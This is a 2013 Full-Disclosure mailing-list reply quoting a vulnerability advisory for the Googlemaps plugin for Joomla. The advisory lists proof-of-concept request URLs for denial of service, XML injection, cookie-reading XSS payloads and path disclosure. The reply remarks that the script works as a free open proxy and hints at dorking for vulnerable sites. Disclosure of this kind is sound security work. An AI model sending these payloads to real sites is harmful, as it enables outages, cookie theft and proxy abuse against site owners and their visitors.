Re: Multiple vulnerabilities in Googlemaps plugin for Joomla

[Źmicier Januszkiewicz <gauri () tut by>]

Ah, and as a side effect, you get a bunch of free HTTP proxies -- the
script will fetch and print anything. Just to fix up the content type, but
this should not be an issue.

Finally, something useful.

I leave the google dork as an exercise for the reader.

Cheers,
Z.


2013/7/16 MustLive <mustlive () websecurity com ua>

> Hello list!
>
> These are Denial of Service, XML Injection, Cross-Site Scripting and Full
> path disclosure vulnerabilities in Googlemaps plugin for Joomla.
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and
> potentially previous versions. In new version of DAVOSET I'll add a lot of
> web sites with Googlemaps plugin.
>
> -------------------------
> Affected vendors:
> -------------------------
>
> Mike Reumer
> http://extensions.joomla.org/**extensions/maps-a-weather/**
> maps-a-locations/maps/1147<http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147>
>
> ----------
> Details:
> ----------
>
> Denial of Service (WASC-10):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=site2/large_file<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file>
>
> Besides conducting DoS attack manually, it's also possible to conduct
> automated DoS and DDoS attacks with using of DAVOSET (
> http://lists.webappsec.org/**pipermail/websecurity_lists.**
> webappsec.org/2013-June/**008850.html<http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html>
> ).
>
> XML Injection (WASC-23):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=site2/xml.xml<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml>
>
> It's possible to include external xml-files. Which also can be used for
> XSS attack:
>
> XSS via XML Injection (WASC-23):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=site2/xss.xml<http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml>
>
> File xss.xml:
>
> <?xml version="1.0" encoding="utf-8"?>
> <feed>
>  <title>XSS</title>
>  <entry>
>  <div xmlns="http://www.w3.org/1999/**xhtml <http://www.w3.org/1999/xhtml>
> "><script>alert(document.**cookie)</script></div>
>  </entry>
> </feed>
>
> Cross-Site Scripting (WASC-08):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php?**
> url=%3Cbody%20onload=alert(**document.cookie)%3E<http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E>
>
> Full path disclosure (WASC-13):
>
> http://site/plugins/content/**plugin_googlemap2_proxy.php<http://site/plugins/content/plugin_googlemap2_proxy.php>
>
> Besides plugin_googlemap2_proxy.php, also happens
> plugin_googlemap3_proxy.php (but it has other path at web sites).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
> ______________________________**_________________
> Full-Disclosure - We believe in it.
> Charter: 
> http://lists.grok.org.uk/full-**disclosure-charter.html<http://lists.grok.org.uk/full-disclosure-charter.html>
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/